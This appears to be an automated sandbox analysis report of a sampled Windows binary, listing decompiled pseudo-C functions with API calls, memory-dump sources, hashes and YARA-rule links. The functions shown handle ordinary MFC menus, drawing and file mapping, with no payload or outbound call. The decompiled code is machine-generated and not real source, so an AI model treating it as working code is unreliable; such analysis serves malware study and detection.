Download Yara Rule

C-Code - Quality: 71%

			E00415357(intOrPtr __ecx, void* __edi, void* __fp0) {
				intOrPtr _t35;
				intOrPtr _t50;
				intOrPtr* _t54;
				void* _t56;
				signed int _t57;
				intOrPtr _t60;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t56 = __edi;
				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_push( *((intOrPtr*)(_t63 + 0xc)));
				 *((intOrPtr*)(_t63 - 0x10)) = __ecx;
				L004266C0();
				 *(_t63 - 4) = 0;
				_t35 = E00401A64( *((intOrPtr*)(_t63 - 0x10)),  *((intOrPtr*)(_t63 + 0xc)));
				_t60 = _t35;
				if(_t60 != 0) {
					if( *((intOrPtr*)(_t63 + 8)) != 0) {
						_t35 = L004013DE(_t60,  *((intOrPtr*)(_t63 + 8)));
					}
					 *(_t60 + 4) =  *(_t60 + 4) | 0xffffffff;
					_push(_t56);
					_t57 =  *(_t63 + 0x10);
					 *(_t60 + 0xc) = _t57;
					if(_t57 >= 0) {
						 *(_t60 + 4) = 0;
						if( *((intOrPtr*)(_t60 + 0x1c)) == 0) {
							_push(8);
							L00425E38();
							_t50 = _t35;
							 *((intOrPtr*)(_t63 + 0xc)) = _t50;
							 *(_t63 - 4) = 1;
							if(_t50 == 0) {
								_t35 = 0;
							} else {
								L00425F8E();
							}
							 *(_t63 - 4) = 0;
							 *((intOrPtr*)(_t60 + 0x1c)) = _t35;
						} else {
							L004266BA();
						}
						_push(1);
						_push(1);
						_push(0xff);
						_push( *0x440d0c);
						_push( *0x440d08);
						L00426000();
						if(E00401140( *((intOrPtr*)(_t63 - 0x10)), _t74,  *((intOrPtr*)(_t60 + 0x1c)), _t57) == 0) {
							L004266BA();
							_t54 =  *((intOrPtr*)(_t60 + 0x1c));
							if(_t54 != 0) {
								 *((intOrPtr*)( *_t54 + 4))(1);
							}
							 *(_t60 + 0xc) =  *(_t60 + 0xc) | 0xffffffff;
							 *(_t60 + 4) =  *(_t60 + 4) | 0xffffffff;
							 *((intOrPtr*)(_t60 + 0x1c)) = 0;
						}
					}
					_push(1);
					_pop(0);
				}
				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return 0;
			}

0x00415357
0x00415357
0x0041535c
0x00415361
0x00415362
0x00415365
0x00415368
0x0041536e
0x0041537b
0x0041537e
0x00415383
0x00415387
0x00415390
0x00415397
0x00415397
0x0041539c
0x004153a0
0x004153a1
0x004153a6
0x004153a9
0x004153b2
0x004153b7
0x004153c0
0x004153c2
0x004153c8
0x004153ca
0x004153cf
0x004153d3
0x004153dc
0x004153d5
0x004153d5
0x004153d5
0x004153de
0x004153e1
0x004153b9
0x004153b9
0x004153b9
0x004153e4
0x004153e9
0x004153eb
0x004153f0
0x004153f6
0x004153fc
0x0041540f
0x00415414
0x00415419
0x0041541e
0x00415424
0x00415424
0x00415427
0x0041542b
0x0041542f
0x0041542f
0x0041540f
0x00415432
0x00415434
0x00415435
0x0041543a
0x00415441
0x0041544d
0x00415455

APIs

_EH_prolog.MSVCRT ref: 0041535C
#539.MFC42(?), ref: 0041536E

Part of subcall function 00401A64: GetMenuItemCount.USER32 ref: 0041589A
Part of subcall function 00401A64: GetSubMenu.USER32 ref: 004158A4
Part of subcall function 00401A64: #2863.MFC42(00000000), ref: 004158AB
Part of subcall function 00401A64: GetMenuItemCount.USER32 ref: 004158F7

#2408.MFC42(?,?), ref: 004153B9
#823.MFC42(00000008,?,?), ref: 004153C2
#384.MFC42(?,?), ref: 004153D5
#2096.MFC42(000000FF,00000001,00000001,?,?), ref: 004153FC
#2408.MFC42(000000FF,00000001,00000001,?,?), ref: 00415414
#800.MFC42(?), ref: 00415441

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$#2408CountItem$#2096#2863#384#539#800#823H_prolog
String ID:
API String ID: 2252731133-0
Opcode ID: 42b41ac201261c7f00718324c81c6631226223ba562c79d179f4fcfba59a4e58
Instruction ID: ce0e6e9cc929e7511650859b5746510ee2860919f63265505e5037ca4bfda0b0
Opcode Fuzzy Hash: 42b41ac201261c7f00718324c81c6631226223ba562c79d179f4fcfba59a4e58
Instruction Fuzzy Hash: 6831D531600B14DFCB24DF65D841AEEBBB1EF44314F50862FE566976E0C7749981CB08

Uniqueness

Uniqueness Score: -1.00%

Function 0040142E, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040142E(void* __ecx) {
				void* _t40;
				intOrPtr* _t43;
				void* _t45;
				void* _t60;
				void* _t63;

				L004269E6();
				_t60 = __ecx;
				SetRectEmpty(_t63 - 0x2c);
				_push( *((intOrPtr*)(_t63 + 0x10)));
				_push(_t63 - 0x2c);
				L00426834();
				 *(_t63 - 0x1c) =  *(_t63 - 0x1c) & 0x00000000;
				 *(_t63 - 0x18) =  *(_t63 - 0x18) & 0x00000000;
				 *(_t63 - 0x10) =  *(_t63 - 0x10) & 0x00000000;
				_push(_t60);
				 *((intOrPtr*)(_t63 - 0x14)) =  *((intOrPtr*)(_t60 + 0x7c)) -  *(_t63 - 0x2c) +  *((intOrPtr*)(_t63 - 0x24));
				L00426864();
				 *(_t63 - 4) =  *(_t63 - 4) & 0x00000000;
				_t40 = _t60 + 0x80;
				_push(_t40);
				L0042667E();
				_t45 = _t40;
				DrawTextA( *(_t63 - 0x3c),  *(_t60 + 0x88), 0xffffffff, _t63 - 0x1c, 0x2610);
				if(_t45 != 0) {
					_push(_t45);
					L0042667E();
				}
				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
				L0042685E();
				_t43 =  *((intOrPtr*)(_t63 + 8));
				 *_t43 = 0x7fff;
				 *((intOrPtr*)(_t43 + 4)) =  *((intOrPtr*)(_t63 - 0x28)) -  *(_t63 - 0x18) -  *((intOrPtr*)(_t63 - 0x20)) +  *(_t63 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t43;
			}

0x0041df91
0x0041df9e
0x0041dfa1
0x0041dfa7
0x0041dfaf
0x0041dfb0
0x0041dfb8
0x0041dfbf
0x0041dfc3
0x0041dfc7
0x0041dfce
0x0041dfd1
0x0041dfd6
0x0041dfda
0x0041dfe0
0x0041dfe4
0x0041dfef
0x0041e000
0x0041e008
0x0041e00a
0x0041e00e
0x0041e00e
0x0041e013
0x0041e01a
0x0041e022
0x0041e02d
0x0041e037
0x0041e03d
0x0041e045

APIs

_EH_prolog.MSVCRT ref: 0041DF91
SetRectEmpty.USER32(?), ref: 0041DFA1
#1716.MFC42(?,?), ref: 0041DFB0
#289.MFC42(?,?,?), ref: 0041DFD1
#5787.MFC42(?,?,?,?), ref: 0041DFE4
DrawTextA.USER32(?,?,000000FF,00000000,00002610), ref: 0041E000
#5787.MFC42(00000000,?,?,?), ref: 0041E00E
#613.MFC42(?,?,?), ref: 0041E01A

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5787$#1716#289#613DrawEmptyH_prologRectText
String ID:
API String ID: 1509762740-0
Opcode ID: 3ead366b0e94e5f576af61d423a2feb249b86c45187618b18bb597514f4f47e9
Instruction ID: c2cb669813e9365de1b0dddebe666933175c197f38cd134da9f0e21e4689c7d8
Opcode Fuzzy Hash: 3ead366b0e94e5f576af61d423a2feb249b86c45187618b18bb597514f4f47e9
Instruction Fuzzy Hash: DA21E072D00219DFCB15DFA5D885BEEB7B4FF04324F11851AE42267290DB78AA15CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040162C, Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040162C(void* __ecx) {
				void* _t33;
				intOrPtr _t52;
				void* _t58;
				void* _t60;

				L004269E6();
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				_t52 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x10)) = _t60 - 0x108;
				_push(__ecx + 4);
				_push(_t52);
				if(( !( *(_t52 + 0x14)) & 0x00000001) == 0) {
					L00426744();
					E00401316(_t52, __ecx + 8);
					_push(__ecx + 0xc);
					_push(_t52);
					L00426744();
					E00401316(_t52, __ecx + 0x10);
					_push(__ecx + 0x14);
					_push(_t52);
					L00426744();
					E00401316(_t52, __ecx + 0x18);
					_t33 = E00401311(_t52, __ecx + 0x1c);
				} else {
					L0042674A();
					L00401EF1(_t52,  *((intOrPtr*)(__ecx + 8)));
					_push(__ecx + 0xc);
					_push(_t52);
					L0042674A();
					L00401EF1(_t52,  *((intOrPtr*)(__ecx + 0x10)));
					_push(__ecx + 0x14);
					_push(_t52);
					L0042674A();
					L00401EF1(_t52,  *((intOrPtr*)(__ecx + 0x18)));
					_t33 = L00401ECE(_t52,  *((intOrPtr*)(__ecx + 0x1c)));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t33;
			}

0x0041bd46
0x0041bd53
0x0041bd58
0x0041bd5d
0x0041bd6a
0x0041bd6b
0x0041bd6c
0x0041bdc0
0x0041bdcb
0x0041bdd3
0x0041bdd4
0x0041bdd5
0x0041bde0
0x0041bde8
0x0041bde9
0x0041bdea
0x0041bdf5
0x0041be00
0x0041bd6e
0x0041bd6e
0x0041bd78
0x0041bd80
0x0041bd81
0x0041bd82
0x0041bd8c
0x0041bd94
0x0041bd95
0x0041bd96
0x0041bda0
0x0041bdaa
0x0041bdaa
0x0041bdb4
0x0041bdbd

APIs

_EH_prolog.MSVCRT ref: 0041BD46
#882.MFC42(?,00000000), ref: 0041BD6E
#882.MFC42(?,?,?,?,00000000), ref: 0041BD82
#882.MFC42(?,?,?,?,?,?,?,00000000), ref: 0041BD96
#879.MFC42(?,00000000), ref: 0041BDC0
#879.MFC42(?,?,?,00000000), ref: 0041BDD5
#879.MFC42(?,?,?,?,?,00000000), ref: 0041BDEA

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #879#882$H_prolog
String ID:
API String ID: 3979785096-0
Opcode ID: 23754bc49887ffe80959d4b5b157114e95f0644b616720dee6c5b38055bb4e9b
Instruction ID: 8321d0028c6a4c29eb6ea48d31a90a143c10616c19efbba5b6600ea2a6d3dadc
Opcode Fuzzy Hash: 23754bc49887ffe80959d4b5b157114e95f0644b616720dee6c5b38055bb4e9b
Instruction Fuzzy Hash: 3111A871600604ABC625FB62E845D7F73BDEFC4718740052FFC4293A51CB3CE905A669

Uniqueness

Uniqueness Score: -1.00%

Function 00401433, Relevance: 10.6, APIs: 7, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00401433(intOrPtr* __ecx) {
				void* _t18;
				void* _t37;
				void* _t38;
				intOrPtr* _t41;
				void* _t43;

				L004269E6();
				_t41 = __ecx;
				if(L004012AD(__ecx) == 0) {
					 *0x442230 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4,  *( *((intOrPtr*)( *_t41 + 0x14))(_t43 - 0x10)));
					L00425DFC();
					_t18 =  *0x442230;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, 6, 0, 0, 4);
						L004268BE();
						 *(_t43 - 4) = 0;
						 *_t38 =  *((intOrPtr*)( *_t41 + 0x18))(_t41 + 4, 1, _t37);
						UnmapViewOfFile(_t38);
						L004016DB(_t41);
						 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
						L004268CA();
						_push(1);
						_pop(0);
					} else {
						goto L3;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return 0;
			}

0x00420407
0x00420411
0x0042041a
0x0042043c
0x00420441
0x00420446
0x0042044d
0x00420461
0x0042046c
0x00420475
0x0042047c
0x0042047e
0x00420486
0x0042048b
0x00420492
0x00420497
0x00420499
0x00000000
0x00000000
0x00000000
0x0042044d
0x004204a0
0x004204a8

APIs

_EH_prolog.MSVCRT ref: 00420407
CreateFileMappingA.KERNEL32 ref: 00420433
#800.MFC42 ref: 00420441
MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00000004), ref: 0042045B
#521.MFC42(?,00000001), ref: 0042046C
UnmapViewOfFile.KERNEL32(00000000), ref: 0042047E
#6307.MFC42 ref: 00420492

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: File$View$#521#6307#800CreateH_prologMappingUnmap
String ID:
API String ID: 1158948252-0
Opcode ID: c868305a8049d8fc227162506ad92db6b29cf95260271956b57a6d17655cc24c
Instruction ID: b3a866acf95f4eedce8cf995ab7db8df16ba03b83de07bd51f54e54c187258c6
Opcode Fuzzy Hash: c868305a8049d8fc227162506ad92db6b29cf95260271956b57a6d17655cc24c
Instruction Fuzzy Hash: 4811B171B00214AFD714AFA4EC85A6EB7B8FB04758F50456AF212E32E1CBB889008658

Uniqueness

Uniqueness Score: -1.00%

Function 00402185, Relevance: 10.6, APIs: 7, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00402185(void* __ecx) {
				struct HICON__* _t22;
				void* _t23;
				signed int _t37;
				void* _t41;

				L004269E6();
				_t37 =  *(_t41 + 0x14);
				_push(0);
				 *(__ecx + 0x68) = _t37 & 0x0040ffff;
				_push(GetSysColorBrush(0xf));
				_t22 = LoadCursorA(0, 0x7f00);
				_push(_t22);
				_push(8);
				L004264E6();
				_push(_t22);
				L00425FB8();
				_push(0);
				_push( *((intOrPtr*)(_t41 + 0x10)));
				_t23 = _t41 - 0x1c;
				_push( *((intOrPtr*)(_t41 + 0xc)));
				 *(_t41 - 4) = 0;
				 *((intOrPtr*)(_t41 - 0x1c)) = 0;
				 *((intOrPtr*)(_t41 - 0x18)) = 0;
				_push(_t23);
				_push(_t37 & 0xffbf0000 | 0x02000000);
				_push( *((intOrPtr*)(_t41 + 8)));
				 *((intOrPtr*)(_t41 - 0x14)) = 0;
				 *((intOrPtr*)(_t41 - 0x10)) = 0;
				_push( *(_t41 + 0x14));
				L00425F76();
				if(_t23 != 0) {
					_push(1);
					_pop(0);
				}
				 *(_t41 - 4) =  *(_t41 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return 0;
			}

0x0040fd2e
0x0040fd38
0x0040fd47
0x0040fd4a
0x0040fd53
0x0040fd5a
0x0040fd60
0x0040fd61
0x0040fd63
0x0040fd68
0x0040fd6c
0x0040fd71
0x0040fd78
0x0040fd7b
0x0040fd86
0x0040fd89
0x0040fd8c
0x0040fd8f
0x0040fd92
0x0040fd93
0x0040fd94
0x0040fd97
0x0040fd9a
0x0040fd9d
0x0040fda0
0x0040fda7
0x0040fda9
0x0040fdab
0x0040fdab
0x0040fdac
0x0040fdb3
0x0040fdc0
0x0040fdc8

APIs

_EH_prolog.MSVCRT ref: 0040FD2E
GetSysColorBrush.USER32(0000000F), ref: 0040FD4D
LoadCursorA.USER32 ref: 0040FD5A
#1233.MFC42(00000008,00000000), ref: 0040FD63
#537.MFC42(00000000,00000008,00000000), ref: 0040FD6C
#2124.MFC42(?,?,?,?,?,?,00000000,00000000,00000008,00000000), ref: 0040FDA0
#800.MFC42(?,?,?,?,?,?,00000000,00000000,00000008,00000000), ref: 0040FDB3

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1233#2124#537#800BrushColorCursorH_prologLoad
String ID:
API String ID: 3337878789-0
Opcode ID: 4d7dc7b2052392c82093c9c6f05b52698ad37938432bacbf6bbe6b82b4499562
Instruction ID: fb2db3a3271cd694c6baad7f24bb781f8fccf2eb6ff46da6c32a60cc77efc57c
Opcode Fuzzy Hash: 4d7dc7b2052392c82093c9c6f05b52698ad37938432bacbf6bbe6b82b4499562
Instruction Fuzzy Hash: FC119471A00119ABDB109F96DD46BAFBB78EF90314F10403BF911E72D1C7788914DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040102D, Relevance: 10.6, APIs: 7, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040102D(void* __ecx) {
				intOrPtr* _t34;
				void* _t36;
				void* _t53;

				L004269E6();
				 *(_t53 - 0x10) =  *(_t53 - 0x10) & 0x00000000;
				asm("sbb eax, eax");
				_t34 = ( ~( *(__ecx + 0x388)) & 0x0000fe00) + 0x200;
				_push(_t34);
				_push(0x806e);
				L0042631E();
				_push(_t34);
				L004263A2();
				if( *(__ecx + 0x388) == 0) {
					_push(0x8070);
					L00425FB8();
					 *(_t53 - 0x10) = 2;
					 *(_t53 - 4) = 1;
				} else {
					_push(0x806f);
					L00425FB8();
					 *(_t53 - 0x10) = 1;
					 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				}
				_t36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t53 + 8)))) + 0xc))( *_t34);
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				if(( *(_t53 - 0x10) & 0x00000002) != 0) {
					 *(_t53 - 0x10) =  *(_t53 - 0x10) & 0xfffffffd;
					L00425DFC();
				}
				 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
				if(( *(_t53 - 0x10) & 0x00000001) != 0) {
					L00425DFC();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t36;
			}

0x0040d2c2
0x0040d2ca
0x0040d2e0
0x0040d2e8
0x0040d2ed
0x0040d2ee
0x0040d2f3
0x0040d2f8
0x0040d2fb
0x0040d309
0x0040d325
0x0040d32d
0x0040d332
0x0040d339
0x0040d30b
0x0040d30b
0x0040d313
0x0040d318
0x0040d31f
0x0040d31f
0x0040d348
0x0040d34b
0x0040d353
0x0040d355
0x0040d35c
0x0040d35c
0x0040d361
0x0040d369
0x0040d36e
0x0040d36e
0x0040d376
0x0040d37e

APIs

_EH_prolog.MSVCRT ref: 0040D2C2
#2011.MFC42(0000806E,?), ref: 0040D2F3
#6068.MFC42(00000000,0000806E,?), ref: 0040D2FB
#537.MFC42(0000806F), ref: 0040D313
#537.MFC42(00008070), ref: 0040D32D
#800.MFC42 ref: 0040D35C
#800.MFC42 ref: 0040D36E

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #537#800$#2011#6068H_prolog
String ID:
API String ID: 3826967766-0
Opcode ID: a9cfd796194533d0e169df707676414219d5b04a1d82dbb8f26c28a2660ef2dd
Instruction ID: 75d558a24e3b75f5fc80e9dc755ea56e544658c5c74a9d6510104530e0897fdf
Opcode Fuzzy Hash: a9cfd796194533d0e169df707676414219d5b04a1d82dbb8f26c28a2660ef2dd
Instruction Fuzzy Hash: 4821E170E006199BDB10DBA4C94ABFEB7B4BF40319F50422EE411772D1CBF82A48CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004014A1, Relevance: 10.6, APIs: 7, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E004014A1(void* __ecx, void* __eflags) {
				void* _t28;
				intOrPtr _t33;
				void* _t42;
				intOrPtr _t44;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t42 - 0x10)) = _t44;
				_push(_t42 + 0x14);
				 *(_t42 - 4) = 1;
				L0042611A();
				_push( *((intOrPtr*)(_t42 + 0x10)));
				 *(_t42 - 4) = 2;
				_push(_t44);
				 *((intOrPtr*)(_t42 + 0x10)) = _t44;
				_push(_t42 + 0xc);
				L0042611A();
				_push(_t44);
				 *((intOrPtr*)(_t42 - 0x14)) = _t44;
				_push(0x8067);
				_push(_t44);
				 *(_t42 - 4) = 3;
				L00425FE2();
				_t33 =  *((intOrPtr*)(__ecx + 0x380));
				 *(_t42 - 4) = 1;
				L00401BB8(_t33);
				_push(_t33);
				 *((intOrPtr*)(_t42 + 0x10)) = _t44;
				_push(_t42 + 0xc);
				L0042611A();
				_push(0);
				_t28 = L004014C9(__ecx);
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				L00425DFC();
				 *(_t42 - 4) =  *(_t42 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t28;
			}

0x0040d12f
0x0040d134
0x0040d135
0x0040d139
0x0040d13f
0x0040d142
0x0040d143
0x0040d14a
0x0040d14f
0x0040d155
0x0040d159
0x0040d15c
0x0040d15f
0x0040d160
0x0040d165
0x0040d16b
0x0040d16e
0x0040d173
0x0040d174
0x0040d178
0x0040d17d
0x0040d183
0x0040d187
0x0040d18c
0x0040d192
0x0040d195
0x0040d196
0x0040d19b
0x0040d19f
0x0040d1a4
0x0040d1ab
0x0040d1b0
0x0040d1b7
0x0040d1c0
0x0040d1c8

APIs

_EH_prolog.MSVCRT ref: 0040D12F
#535.MFC42(?), ref: 0040D14A
#535.MFC42(?,?,?,?), ref: 0040D160
#2819.MFC42(?,00008067,?,?,?,?,?), ref: 0040D178
#535.MFC42(?,?,?,00008067,?,?,?,?,?), ref: 0040D196
#800.MFC42(00000000,?,?,?,00008067,?,?,?,?,?), ref: 0040D1AB
#800.MFC42(00000000,?,?,?,00008067,?,?,?,?,?), ref: 0040D1B7

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535$#800$#2819H_prolog
String ID:
API String ID: 2167954325-0
Opcode ID: e211307637b1d43fe90fdc3e4a94f5dec401981ef8b0ea84e80119fa65c3169c
Instruction ID: 9d6747de581eb48175fccc6d0cf0ced1ba660944540de2800a1df285717aa214
Opcode Fuzzy Hash: e211307637b1d43fe90fdc3e4a94f5dec401981ef8b0ea84e80119fa65c3169c
Instruction Fuzzy Hash: 54118270A10258ABCB05DF55D816BEE7BA8AB14318F00814FF452632C2DBB89B14C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 004125AE, Relevance: 10.6, APIs: 7, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 40%

